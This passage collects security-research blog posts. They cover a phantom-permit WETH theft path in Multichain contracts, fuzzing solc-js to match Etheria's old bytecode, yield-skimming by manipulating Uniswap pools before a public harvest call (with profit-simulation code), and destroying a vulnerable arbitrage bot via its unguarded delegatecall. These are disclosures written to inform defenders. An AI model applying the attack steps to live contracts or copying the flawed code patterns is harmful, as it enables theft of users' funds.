Unfortunately, however, the contract already has the approvals of all clients that have ever used the first deposit path (function deposit)!

All WETH of all such clients can be stolen, by a mere depositWithPermit followed by a withdraw call. (To avoid front-running, an attacker might split these two into different transactions, so that the gain is not immediately apparent.)
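
One defensive pattern, sketched below, is to refuse to proceed unless the permit demonstrably executed. This is our illustration, in the spirit of the nonce check later popularized as safePermit in OpenZeppelin’s SafeERC20, and not Multichain’s actual fix: a genuine permit consumes exactly one nonce, while on a token with a phantom permit, such as WETH, the nonces call itself reverts instead of silently succeeding.

interface IERC20Permit {
    function nonces(address owner) external view returns (uint256);
    function permit(address owner, address spender, uint256 value, uint256 deadline,
                    uint8 v, bytes32 r, bytes32 s) external;
}

library SafePermit {
    function checkedPermit(
        IERC20Permit token, address owner, address spender,
        uint256 value, uint256 deadline,
        uint8 v, bytes32 r, bytes32 s
    ) internal {
        // Reverts for tokens without nonces (e.g., WETH's state-writing
        // fallback cannot serve this staticcall), failing safe.
        uint256 nonceBefore = token.nonces(owner);
        token.permit(owner, spender, value, deadline, v, r, s);
        // A genuine permit consumes exactly one nonce.
        require(token.nonces(owner) == nonceBefore + 1, "permit did not execute");
    }
}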

Phantom Functions | Notes:

Two separate vulnerabilities are based on the above attack vector. The first was outlined above. The second, on AnySwap router contracts, is a little harder to exploit — requires impersonating a token of a specific kind. We do not illustrate in detail because the purpose of this quick writeup is to inform the community of the attack vector, rather than to illustrate the specifics of an attack.

We have exhaustively searched for other services with similar vulnerable code and exposure. This includes vulnerable contracts with approvals over tokens with phantom permits other than WETH. Although we have found other instances of the vulnerable code patterns, the contracts currently have very low or zero approvals on Ethereum. (This kind of research is exactly what our contract-library.com analysis infrastructure lets us do quickly.) On other chains, our search has not been as exhaustive, since we have no readily indexed repository of all deployed contracts. However, our best indicators suggest that there is no great exposure outside the AnySwap/Multichain contracts.

Concluding

We have been awarded Multichain’s maximum published bug bounty of $1M for each of the two vulnerability disclosures. (Thank you for the generous recognition of this extraordinary threat!)

This was an attack discovered by first suspecting the pattern and then looking for it in actual deployed contracts. Although in hindsight the attack vector is straightforward, it was far from straightforward when we first considered it. In fact, our initial exchange, at 2:30am on a Sunday, was literally:

I had a crazy idea for a vulnerability. Want to sanity check the basics?

Crazy, indeed, how this could lead to one of the largest hacks in history.

Etheria | A Six-year-old Solc Riddle

By the Dedaub team

The Assignment

A few weeks ago, we were approached with a request to work on a project unlike any we’ve had before.

Cyrus Adkisson is the creator of Etheria, a very early Ethereum app that programmatically generates “tiles” in a finite geometric world. Etheria has a strong claim to being the first NFT project, ever! It was first presented at DEVCON1 and has been around since October 2015 — six years and counting. It is as much Ethereum “history” as it gets.

Cyrus heard of us as bytecode and decompilation experts. His request was simple: try to reproduce the 6-year-old deployed bytecode of Etheria from the available sources. This is a goal of no small importance: Etheria tiles can be priced in the six digits, and the history of the project can only be strengthened by tying the human-readable source to the long-running binary code.

Easy, right? Just compile with a couple of different versions and settings until the bytecode matches. Heck, etherscan verifies contracts automatically, why would this be hard?

Maybe for the simple fact that Cyrus had been desperately trying for months to get matching bytecode from the sources, to no avail! Christian Reitwiessner, the creator of Solidity and solc, had been offering tips. Yet no straightforward solution had been in sight, after much, much effort.

To see why, consider:

  • The version of solc used was likely (but not definitely) 0.1.6. Only one build of that version is readily available in modern tools (Remix) but the actual build used may have been different.
  • The exact version of the source is not pinned down with 100% confidence. The source code available was committed a couple of days after the bytecode was deployed.
  • Flags and optimization settings were not known.
  • The deployed code was produced by “browser-solidity”, the precursor of Remix. Browser-solidity is non-deterministic with respect to (we thought!) blank space and comments. (“Unstable” might be a better term: adding blank space seems to affect the produced bytecode. But we’ll stick with “non-deterministic”, since it’s more descriptive to most.)
  • Solc was not deterministic even years later.

If you want to try your hand at this, now is a good time to pause reading. It’s probably safe to say that after a few hours you will be close to convinced that this is simply impossible. Too many unknowns, too much unpredictability, produced code that is tantalizingly close but seemingly never the same as the deployed code!

Dead Ends

Our challenge consisted of finding source code or a compilation setup that would produce compiled code identical to the 6-yr old deployed Etheria bytecode.

The opening team message for the project set the tone: “We are all apprehensive but also excited about this project. It looks like a great mystery, but also a very hard and tedious search that will possibly fail.” Intellectual curiosity soon overtook all involved. People were putting aside their regular weekly assignments, working overtime to try to contribute to “the puzzle”. Some were going down a rabbithole of frantic searches for days — more on that later.

Some encouraging signs emerged at the very first look at the compiled code: when reverse-engineered to high-level code (by the lifter used in contract-library.com), it produced semantically identical Solidity-like output.

But our hopes were squashed upon more careful inspection. The low-level bytecode would always have small but significant differences. Some blocks were re-used (via jumps) in the deployed version but replicated (inlined) in the compiled version. The ordering of blocks would always be a little different. Even matching the bytecode size was a challenge: with manual tries of the (non-deterministic) compilation process, we would almost never get the deployed bytecode size down to the byte, always 2–4 bytes away.

Dead ends started piling up, but every one was narrowing the search space.

  • The version of solc used was definitely 0.1.6, based on the timeline of releases. However, the exact build might have made a difference. And, in fact, our compiler was not solc but solc-js, the Javascript wrapper of solc. There are 17 different versions of solc-js v0.1.6. There are even different versions with the exact same filename — e.g., there are 4 different builds (different md5 hashes) all called soljson-v0.1.6-2015-11-03-48ffa08.js. However, no optimizations or compilation gadgets that would explain the difference were introduced in the different builds. We could see no correlation between the compiled code artifacts and the exact build of solc-js, just the occasional non-determinism.
  • Different optimization settings made too-drastic a difference. Browser-solidity did not even allow configuring optimization runs, so the only question was whether optimization was on at all, and it very clearly was, based on the deployed bytecode.
  • Non-determinism seemed to creep in, even for changes as simple as the filename used.

With so little left to try, frustration started building up. Was this just a random search? And over what? Blank space in the compiled file? Reordering of functions? Small source code changes that yielded equivalent code? Removing dead code from the source?

We tried many of these, ad hoc or systematically and the tiny but persistent differences from the deployed bytecode never went away. Private function reordering looked very promising for a little while. But a full match was nowhere to be seen.

A Breakthrough

Although still several days away from the solution, an important insight arose, after lots of trial and error.

Non-determinism was due to solc-js, the Javascript wrapper, not to individual invocations of the solc executable itself. Solc-js uses emscripten to run the native solc executable inside a Javascript engine. Emscripten back in the day translated a binary into asm.js (not yet WASM). Something in this pipeline was introducing non-determinism.

But what kind? Since the solc executable was itself deterministic when invoked freshly, the insight was that the apparent non-determinism of solc-js depended on what had been compiled before, and not only on no-op features of the compiled file (e.g., comments, blanks, filename)! In fact, we saw blank space in the compiled file rarely make a difference in the output bytecode. However, earlier compiled files reliably affected the later output.

Christian Reitwiessner later confirmed that non-determinism was due to using native pointers (i.e., machine addresses) as keys in data structures, so that a re-run from scratch was likely to appear deterministic (objects were being allocated to the same positions on an empty address space) whereas a followup compilation depended on earlier actions.

We now had a more reliable lever to apply force to and cause shuffles in the compiled bytecode. And we could get systematic — we would basically be fuzzing the compiler! Our workhorse was the functionality below, which you can try for yourself:

https://dedaub.com/etheria/fuzzer.html

Open the dev console on your browser (F12) and hit “go”. It starts compiling random (unrelated) files before it tries the main file we aim to verify. The (pseudo-)randomization process is controlled by a seed, so that if a match is found it can be reproduced. The seed gets itself updated pseudo-randomly and the process repeats. The output looks like this:

current seed 449777 automate.js:116:11
...
compile 0 NEW soljson-v0.1.6-2015-10-16-d41f8b7.js etheria-1pt2_nov4.sol(1968d2bc81cfd17cd7fd8bfc6cbc4672) 1700cdc5e2c5fbb9f4ca49fe9fae1291 -4 5796 automate.js:72:11
--------- NEW BEST ------------- 5796 1700cdc5e2c5fbb9f4ca49fe9fae1291

Notice the key parts: this compilation output is “new” (i.e., not seen with previous seeds), has a length distance of -4 from the target, and an edit distance of 5796, which is a new best.

If you observe the execution, you can appreciate how much entropy is revealed: new solutions arise with high frequency, even many hours into the execution.

This got our team tremendously excited. Our channel got filled with reports of “new bests”. 0-605 (same size, edit distance 605) gave way to 0-261. We requisitioned our largest server to run tens of parallel headless browser jobs using Selenium. The 0-261 record dropped to 0-150. On every improvement we thought “it can’t get any closer!” And with many parallel jobs running for hours, we let the server crunch for the night.

Finale

The next morning found the search no closer to the goal. 0-150 was derived from several different seeds. This is just a single basic block of 5 instructions in the wrong place, which also causes some jump addresses to shift. But still, not a zero.

By the next evening, it was clear that our fuzzing was running out of entropy. A little disheartened, we tried an “entropy booster” of last resort: adding random whitespace to the top and bottom of all compiled programs. (In fact, this improved-entropy version is the one at the earlier link.) Within hours, the “new best” became 0-114! And yet the elusive zero was still to be seen. Could it be that we would never find it?

Nearly 24 hours later, with the server fuzzing non-stop during the weekend, the channel lit up:

GUYS

WE GOT IT

All that was left was cleanup, tightening, and packaging. We soon had a solution that required merely compiling two unrelated files before the final compilation of the Etheria code. We repeated the process with the compiler running in multi-file mode. We found similar seeds for present-day Remix. Everything became streamlined, optimized, easy to reproduce and verify. You can visualize a successful verification (for one compiler setup) here:

https://dedaub.com/etheria/verify.html

We notified Cyrus a couple of hours later. It was great news, delivered on a Saturday, and the joy was palpable. We had a Tuesday advising call with Christian that was quickly repurposed to be a storytelling and victory celebration. Within a few days, etherscan verified the contract bytecode manually, since solc 0.1.6 is too old to be supported in the automated workflow.

Looking back, there are a few remarkable elements in the whole endeavor. The first is the amount of random noise amplified during a non-deterministic compilation. For a very long time, the sequence of “new” unique compiled bytecodes seemed never ending. A search that now seems, clearly, feasible appeared for long to be hopeless. Another interesting observation is how quickly people got wrapped up into a needle-in-a-haystack search. The challenge of a tough riddle does that to you. Or maybe it was some ancient magic from the faraway Etheria land?

Yield Skimming: Forcing Bad Swaps on Yield Farming

By the Dedaub team

Yield Skimming

Last week we received bug bounties for disclosing smart contract vulnerabilities to Vesper Finance and BT Finance, via immunefi.com. Thank you, all!

(Notice for clients of these services: None of the vulnerabilities drain the original user funds. An attack would have financial impact, but not an overwhelming one. The maximum proceeds in the past few months would have been around $150K, and, once performed, the attack would be likely to alert the service to the vulnerability, making the attack non-repeatable. The vulnerabilities have since been mitigated and, to our knowledge, no funds are currently threatened.)

Both vulnerabilities follow the same pattern and many other services could potentially be susceptible to such attacks (though all others that we checked are not, by design or by circumstance — it will soon be clear what this means). It is, therefore, a good idea to document the pattern and draw some attention to it, as well as to its underlying financials.

Yield Skimming | The Attack

A common pattern in yield farming services is to have strategies that, upon a harvest, swap tokens on an exchange, typically Uniswap. A simplified excerpt from actual deployed code looks like this:

function harvest() public {
  withdrawTokenA();
  uint256 reward = TokenA.balanceOf(address(this));
  // Callable by anyone, and amountOutMin is 0: the swap accepts whatever
  // price the (manipulable) pool currently offers.
  unirouter.swapExactTokensForTokens(reward, 0, pathTokenAB, this, now.add(1800));
  depositTokenB();
}

Example harvest function, with swapping.

Similar code is deployed in hundreds (if not thousands) of contracts. Typical uses of the pattern are a little more complex, with the harvest and the swap happening in different functions. But the essence remains unchanged. Similar code may also be found at the point where the service rebalances its holdings, rather than at the harvest point. We discuss harvest next, as it is rather more common.

[Short detour: you see that now.add(1800) for the “deadline” parameter of the swap? The add(1800) has no effect whatsoever. Inside a contract, the swap will always happen at time now, or not at all. The deadline parameter is only meaningful if you can give it a constant number.]

Back to our main pattern, the problem with the above code is that the harvest can be initiated by absolutely anyone! “What’s the harm?” — you may ask — “Whoever calls it pays gas, only to have the contract collect its rightful yield.”

The problem, however, is that the attacker can call harvest after fooling the Uniswap pool into giving bad prices for the yield. In this way, the victim contract distorts the pool even more, and the attacker can restore it for a profit: effectively the attacker can steal almost all of the yield, if its value is high enough.

In more detail, the attack goes like this:

a) the attacker distorts the Uniswap pool (the AssetA-to-AssetB pool) by selling a lot of the asset A that the strategy will try to swap. This makes the asset very cheap.

b) the attacker calls harvest. The pool does a swap at very bad prices for the asset.

c) the attacker swaps back the Asset B they got in the first step (plus a tiny bit more for an optimal attack) and gets the original asset A at amounts up to the original swapped (of step (a)) plus what the victim contract put in.


Yield Skimming | Example

For illustration, consider some concrete, and only slightly simplified, numbers. (If you are familiar with Uniswap and the above was all you needed to understand the attack, you can skip ahead to the parametric analysis.)

Say the harvest is in token A and the victim wants to swap that to token B. The Uniswap pool initially has 1000 A tokens and 500 B tokens. The “fair” price of an A denominated in Bs is 500/1000 = 0.5. The product k of the amounts of tokens is 500,000: this is a key quantity in Uniswap — the system achieves automatic pricing by keeping this product constant while swaps take place.
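
For reference, all the pool states below are instances of the constant-product rule: ignoring the 0.3% fee (as this example does), a swap that adds $\Delta x$ of token A to reserves $(x, y)$ returns

$$\Delta y \;=\; y - \frac{k}{x + \Delta x}, \qquad k = x \cdot y.$$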

In step (a) the attacker swaps 1000 A tokens into Bs. This will give back to the attacker 250 B tokens, since the Uniswap pool now has 2000 A tokens and 250 B tokens (in order to keep the product k constant). The price of an A denominated in Bs has now temporarily dropped to a quarter of its earlier value: 0.125, as far as Uniswap is concerned.

In step (b) the victim’s harvest function tries to swap, say, 100 A tokens into Bs. However, the price the victim will get is now nowhere near a fair price. Instead, the Uniswap pool goes to 2100 A tokens and 238 B tokens, giving back to the victim just 12 B tokens from the swap.

In step (c) the attacker swaps back the 250 B tokens they got in step (a), or, even better, adds another 12 to reap maximum benefit from the pool skew. The pool is restored to balance at the initial 1000 A tokens and 500 B tokens. The attacker gets back 1100 A tokens for a price of 1000 A tokens and 12 B tokens. The attacker effectively got the 100 As that the victim swapped at 1/4th of the fair price.
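If you prefer to check the arithmetic by running it, here is a minimal Python sketch of the above, assuming an ideal constant-product pool and ignoring the 0.3% swap fee for now (fees enter the parametric analysis below):

def swap(pool, token_in, amount_in):
    # Sell amount_in of token_in to the pool; the pool prices the trade
    # by keeping the product of its two reserves constant.
    token_out = 'B' if token_in == 'A' else 'A'
    k = pool['A'] * pool['B']
    pool[token_in] += amount_in
    amount_out = pool[token_out] - k / pool[token_in]
    pool[token_out] -= amount_out
    return amount_out

pool = {'A': 1000.0, 'B': 500.0}

attacker_b = swap(pool, 'A', 1000)                   # step (a): 250.0 B out
victim_b   = swap(pool, 'A', 100)                    # step (b): ~11.9 B out
attacker_a = swap(pool, 'B', attacker_b + victim_b)  # step (c): 1100.0 A out
print(attacker_b, victim_b, attacker_a, pool)
# 250.0  ~11.9  1100.0  pool back to {'A': 1000.0, 'B': 500.0}

The three attack steps, as ideal constant-product arithmetic.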

Yield Skimming | Parametric Analysis

The simplistic example doesn’t capture an important element. The attacker is paying Uniswap fees for every swap they perform, at steps (a) and (c). Uniswap currently charges 0.3% of the swapped amount in fees for a direct swap. The net result is that the attack makes financial sense only when the amounts swapped by the victim are large. How large, you may ask? If the initial amount of token A in the pool is a and the victim will swap a quantity d of A tokens, when can the attacker make a profit, and what quantity x of A tokens do they need to swap in step (a)? If you crunch the numbers, the cost-benefit analysis comes down to a cubic inequality. Instead of boring you with algebra, let’s ask Wolfram Alpha.

The result that Alpha calculates is that the attack is profitable as long as the number d of A tokens that the victim will swap is more than 0.3% of the number a of A tokens that the pool had initially. In the worst case, d is significant (e.g., 10% of a, as in our example) and the attacker’s maximum profit is very close to the entire swapped amount.
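To sanity-check this threshold without the algebra, here is a rough numerical sweep in Python (a sketch: it simply tries many attack sizes x and, for simplicity, has the attacker swap back in step (c) exactly the B tokens obtained in step (a)):

def out_given_in(amount_in, reserve_in, reserve_out, fee=0.003):
    # Constant-product output for a swap, with a Uniswap-v2-style fee
    # charged on the input amount.
    effective_in = amount_in * (1 - fee)
    return effective_in * reserve_out / (reserve_in + effective_in)

def attacker_profit(x, d, a=1000.0, b=500.0, fee=0.003):
    got_b = out_given_in(x, a, b, fee)        # step (a): attacker sells x A
    a, b = a + x, b - got_b
    victim_b = out_given_in(d, a, b, fee)     # step (b): victim's harvest swap
    a, b = a + d, b - victim_b
    got_a = out_given_in(got_b, a, b, fee)    # step (c): attacker sells B back
    return got_a - x                          # attacker's net gain in A tokens

for frac in (0.001, 0.003, 0.01, 0.1):
    d = 1000 * frac                           # victim swap, as a fraction of the pool
    best = max(attacker_profit(x / 2, d) for x in range(1, 8001))
    print(f"d = {frac:.1%} of pool: best attacker profit {best:+.3f} A")

In this sweep the profit turns positive almost exactly where d crosses the 0.3% fee, matching the closed-form result; for d at 10% of the pool, the attacker captures most of the victim’s 100 tokens.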

Another consideration is gas prices, which we currently don’t account for. For swaps in the thousands of dollars, gas prices will be a secondary cost, anyway.

Yield Skimming | Mitigation

In practice, yield farming services protect against such attacks in one of the following ways:

  • They limit the callers of harvest or rebalance. This also needs care: some services limit the direct callers of harvest, but the trusted callers include contracts that themselves expose public functions that (transitively) call harvest.
  • They have bots that call harvest regularly, so that the swapped amounts never grow too much. Keep3r seems to be doing this consciously. This is fine but costly, since the service incurs gas costs even for harvests that don’t produce much yield.
  • They check the slippage suffered in the swap to ensure that the swap itself is not too large relative to the liquidity of the pool. We mention this to emphasize that it is not valid protection! Note the numbers in our above example (spelled out in the sketch right after this list). The problem with the victim’s swap in step (b) is not high slippage: the victim gets back 12 B tokens (11.9 to be exact) whereas with zero slippage they would have gotten back 12.5. This difference, of about 5%, may certainly pass a slippage check. The problem is not the 5% slippage but the 4x lower-than-fair price of the asset, to begin with!
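To spell out the numbers in that last bullet (same sketch conventions as above, using the example’s reserves):

a_reserve, b_reserve = 2000.0, 250.0   # pool after the attacker's step (a)
d = 100.0                              # the victim's swap

spot = b_reserve / a_reserve                    # 0.125 B per A (distorted price)
ideal_out = d * spot                            # 12.5 B with zero slippage
actual_out = b_reserve - (a_reserve * b_reserve) / (a_reserve + d)

print(f"slippage: {1 - actual_out / ideal_out:.1%}")   # ~4.8%, passes a 5% check
print(f"fair value of the 100 A: {100 * 0.5} B; received: {actual_out:.1f} B")

A slippage check compares against the pool’s current, already-distorted spot price, so it cannot see the manipulation.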

There are other factors that can change the economics of this attack. For instance, the attacker could already hold a significant liquidity position in the Uniswap pool, making the swap fee effectively smaller for them, since fees accrue to liquidity providers. Also, Uniswap v3 was announced right at the time of this writing, and promises 0.05% fees for some price ranges (i.e., one-sixth of the current fees). This may make similar future attacks a lot more economical even for small swaps.

Conclusion

The pattern we found in different prominent DeFi services offers opportunities for interesting financial manipulation. It is an excellent representative of the joint code analysis (e.g., swap functionality reachable by untrusted callers) and financial analysis that are both essential in the modern Ethereum/DeFi security landscape.

Killing a Bad (Arbitrage) Bot … To Save Its Owner

Following the previous white-hat hacks (1, 2) on contracts flagged by our analysis tools, today we’ll talk about another interesting contract. It’s hackable for about $80K, or rather its users are: the contract is just an enabler, having approvals from users and acting on their commands. However, a vulnerability in the enabler allows stealing all the users’ funds. (Of course, we mitigated the vulnerability before posting this article.)

The vulnerable contract is a sophisticated arbitrage bot, with no source on Etherscan. Since it is an arbitrage bot, it is not surprising that we were unable to identify either the contract owner/deployer or its users.

One may question whether we should have expended effort just to save an arbitrageur. However, our mission is to secure the smart contract ecosystem — via our free contract-library service, research, consulting, and audits. Furthermore, arbitrage bots do have a legitimate function in the Ethereum space: the robustness of automated market makers (e.g., Uniswap) depends on the existence of bots. By having bots define a super-efficient trading market, price manipulators have no expected benefit from biasing a price: the bots will eat their profits. (Security guaranteed by the presence of relentless competition is an enormously cool element of the Ethereum ecosystem, in our book.)

Also, thankfully, this hack is a great learning opportunity. It showcases at least three interesting elements:

  • Lack of source code, or general security-by-obscurity, won’t save you for long in this space.
  • There is a rather surprising anti-pattern/bad smell in Solidity programming: the use of this.function(...) instead of just function(...).
  • It’s a lucky coincidence when an attack allows destroying the means of attack itself! In fact, it is the most benign mitigation possible, especially when trying to save someone who is trying to stay anonymous.

Following a Bad Smell

The enabler contract has no source code available. It is not even decompiled perfectly, with several low-level elements (e.g., use of memory) failing to be converted to high-level operations. Just as an example of the complexity, here is the key function for the attack and a crucial helper function (don’t pay too close attention yet — we’ll point you at specific lines later):

function 0xf080362c(uint256 varg0, uint256 varg1) public nonPayable { 
    require(msg.data.length - 4 >= 64);
    require(varg1 <= 0xffffffffffffffff);
    v0, v1 = 0x163d(4 + varg1, msg.data.length);
    assert(v0 + 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff < v0);
    v2 = 0x2225(v1, v1 + (v0 + 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff << 5));
    v3 = v4 = 0x16b6(96 + v2, v2 + 128);
    v5 = v6 = 0;
    while (v5 < v0) {
        if (varg0 % 100 >= 10) {
            assert(v5 < v0);
            v7 = 0x2225(v1, v1 + (v5 << 5));
            v8 = 0x16b6(64 + v7, v7 + 96);
            MEM[MEM[64]] = 0xdd62ed3e00000000000000000000000000000000000000000000000000000000;
            v9 = 0x1cbe(4 + MEM[64], v8, this);
            require((address(v3)).code.size);
            v10 = address(v3).staticcall(MEM[(MEM[64]) len (v9 - MEM[64])], MEM[(MEM[64]) len 32]).gas(msg.gas);
            if (v10) {
                MEM[64] = MEM[64] + (RETURNDATASIZE() + 31 & ~0x1f);
                v11 = 0x1a23(MEM[64], MEM[64] + RETURNDATASIZE());
                if (v11 < 0x8000000000000000000000000000000000000000000000000000000000000000) {
                    0x1150(0, v8, address(v3));
                    0x1150(0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff, v8, address(v3));
                }
            } else {
                RETURNDATACOPY(0, 0, RETURNDATASIZE());
                revert(0, RETURNDATASIZE());
            }
        }
        assert(v5 < v0);
        v12 = 0x2225(v1, v1 + (v5 << 5));
        v13 = 0x16b6(v12, v12 + 32);
        assert(v5 < v0);
        v14 = 0x2225(v1, v1 + (v5 << 5));
        v15 = 0x1a07(32 + v14, v14 + 64);
        assert(v5 < v0);
        v16 = 0x2225(v1, v1 + (v5 << 5));
        v17 = 0x16b6(64 + v16, v16 + 96);
        assert(v5 < v0);
        v18 = 0x2225(v1, v1 + (v5 << 5));
        v19 = 0x16b6(96 + v18, v18 + 128);
        assert(v5 < v0);
        v20 = 0x2225(v1, v1 + (v5 << 5));
        v21, v22 = 0x21c2(v20, v20 + 128);
        MEM[36 + MEM[64]] = address(v17);
        MEM[36 + MEM[64] + 32] = address(v3);
        MEM[36 + MEM[64] + 64] = v23;
        MEM[36 + MEM[64] + 96] = address(v19);
        MEM[36 + MEM[64] + 128] = 160;
        v24 = 0x1bec(v22, v21, 36 + MEM[64] + 160);
        MEM[MEM[64]] = v24 - MEM[64] + 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe0;
        MEM[64] = v24;
        MEM[MEM[64] + 32] = v15 & 0xffffffff00000000000000000000000000000000000000000000000000000000 | 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffff & MEM[MEM[64] + 32];
        v25 = 0x1c7e(MEM[64], MEM[64]);
        v26 = address(v13).delegatecall(MEM[(MEM[64]) len (v25 - MEM[64])], MEM[(MEM[64]) len 0]).gas(msg.gas);
        if (RETURNDATASIZE() == 0) {
            v27 = v28 = 96;
        } else {
            v27 = v29 = MEM[64];
            MEM[v29] = RETURNDATASIZE();
            RETURNDATACOPY(v29 + 32, 0, RETURNDATASIZE());
        }
        require(v26, 'delegatecall fail');
        v23 = v30 = 0x1a23(32 + v27, 32 + v27 + MEM[v27]);
        assert(v5 < v0);
        v31 = 0x2225(v1, v1 + (v5 << 5));
        v3 = v32 = 0x16b6(96 + v31, v31 + 128);
        v5 += 1;
    }
    v33 = 0x20bd(MEM[64], v23);
    return MEM[(MEM[64]) len (v33 - MEM[64])];
}

function 0x16b6(uint256 varg0, uint256 varg1) private { 
    require(varg1 - varg0 >= 32);
    v0 = msg.data[varg0];
    0x235c(v0);  // no-op
    return v0;
}

Key function decompiled. Unintelligible, right?

Faced with this kind of low-level complexity, one might be tempted to give up. However, there are many red flags. What we have on our hands is a publicly callable function that performs absolutely no checks on who calls it. No msg.sender check, no reads of storage to establish the state it is called in, none of the common ways one would protect a sensitive piece of code.

And this code is not just sensitive, it is darn sensitive. It does a delegatecall (line 55) on an address that it gets from externally-supplied data (line 76)! Maybe this is worth a few hours of reverse engineering?

Vulnerable code in contracts is not rare, but most of these contracts are not used with real money. A query of token approvals and balances shows that this one is! There is a victim account that has approved the vulnerable enabler contract for all its USDT, all its WETH, and all its USDC.

Victim token approvals, including to the enabler (0x15cb5c845b…).

And how much exactly is the victim’s USDT, USDC, and WETH? Around $77K at the time of the snapshot below.

Victim’s balances.
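For reference, such a lookup needs nothing beyond the standard ERC-20 view functions. Here is a minimal web3.py sketch: the victim and enabler addresses are placeholders, since we keep them elided above, and the RPC endpoint is hypothetical.

from web3 import Web3

w3 = Web3(Web3.HTTPProvider("https://rpc.example.org"))  # hypothetical endpoint

# Just the two standard ERC-20 view functions we need.
ERC20_ABI = [
    {"name": "allowance", "type": "function", "stateMutability": "view",
     "inputs": [{"name": "owner", "type": "address"},
                {"name": "spender", "type": "address"}],
     "outputs": [{"name": "", "type": "uint256"}]},
    {"name": "balanceOf", "type": "function", "stateMutability": "view",
     "inputs": [{"name": "owner", "type": "address"}],
     "outputs": [{"name": "", "type": "uint256"}]},
]

VICTIM  = "0x..."  # placeholder: the victim account
ENABLER = "0x..."  # placeholder: the bot contract (0x15cb5c845b... above)
USDT    = "0xdAC17F958D2ee523a2206206994597C13D831ec7"  # mainnet USDT

token = w3.eth.contract(address=USDT, abi=ERC20_ABI)
print("approved to enabler:", token.functions.allowance(VICTIM, ENABLER).call())
print("victim balance:     ", token.functions.balanceOf(VICTIM).call())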

Reverse Engineering

The above balances and suspicious code prompted us to do some manual reverse engineering. Cross-checking against past transactions, we found the functionality of the vulnerable code fairly easy to discern. At the end of our reverse-engineering session, here is the massaged code that matters for the attack:

pragma experimental ABIEncoderV2;

contract VulnerableArbitrageBot is Ownable {

    struct Trade {
        address executorProxy;
        address fromToken;
        address toToken;
        ...
    }
    
    function performArbitrage(address initialToken, uint256 amt, ..., Trade[] memory trades) external onlyOwner {
        ...
        IERC20(initialToken).transferFrom(msg.sender, address(this), amt); // pull the user's funds
        ...
        this.performArbitrageInternal(..., trades); // notice the use of 'this'
    }
    
    function performArbitrageInternal(..., Trade[] memory trades) external {
        for (uint i = 0; i < trades.length; i++) {
            Trade memory trade = trades[i];
            // ...
            IERC20(trade.fromToken).approve(...);
            // ...
            trades[i].executorProxy.delegatecall(
              abi.encodeWithSignature("trade(address,address...)", trade.fromToken, trade.toToken, ...)
            );
        }
    }
}

interface TradeExecutor {
   function trade(...) external returns (uint);
}

contract UniswapExecutor is TradeExecutor {
    function trade(address fromToken, address toToken, ... ) external returns (uint) {
        // perform trade
        ...
    }
}

This function, 0xf080362c, or performArbitrageInternal as we chose to name it (since the hash has no publicly known reversal), is merely doing a series of trades, as instructed by its caller. Examining past transactions shows that the code is exploiting arbitrage opportunities.

Our enabler is an arbitrage bot and the victim account is the beneficiary of the arbitrage!

Since we did not fully reverse engineer the code, we cannot be sure what the fatal flaw in the design is. Did the programmers consider the obscurity of a bytecode-only deployment protection enough? Did they accidentally make function 0xf080362c/performArbitrageInternal public? Did they believe the function was safe because it is only ever called from inside the contract itself?

We cannot be entirely sure, but we speculate that the function was accidentally made public. Reviewing the transactions that call 0xf080362c reveals that it is never called externally, only as an internal transaction from the contract to itself.

The function being unintentionally public is an excellent demonstration of a Solidity anti-pattern.

Whenever you see the code pattern this.function(...) in Solidity, you should double-check the code.

In most object-oriented languages, prepending this to a self-call is a good pattern. It just says that the programmer wants to be unambiguous as to the receiver object of the function call. In Solidity, however, a call of the form this.function() is an external call to one’s own functionality! The call starts an entirely new sub-transaction, suffers a significant gas penalty, etc. There are some legitimate reasons for this.function() calls, but nearly none when the function is defined locally and when it has side-effects.

Even worse, writing this.function() instead of just function() means that the function has to be externally visible (public or external)! It is not possible to call an internal function via this.function(), although plain function() works fine.

This encourages making public something that probably was never intended to be.

The Operation

Armed with our reverse-engineered code, we could now put together attack parameters that would reach the delegatecall statement with our own callee. Once you reach a delegatecall, it’s game over! The callee gains full control of the contract’s identity and storage. It can do absolutely anything, including transferring the victim’s funds to an account of our choice.

But, of course, we don’t want to do that! We want to save the victim. And what’s the best way? Well, just destroy the means of attack, of course!

So, our actual attack does not involve the victim at all. We merely use the delegatecall to selfdestruct the enabler contract: the bot. The bot had no funds of its own, so nothing is lost by destroying it. To prevent re-deployment of an unfixed bot, we left a note on the Etherscan entry for the bot contract.

To really prevent deployment of a vulnerable bot, of course, one should commission the services of Dedaub. 🙂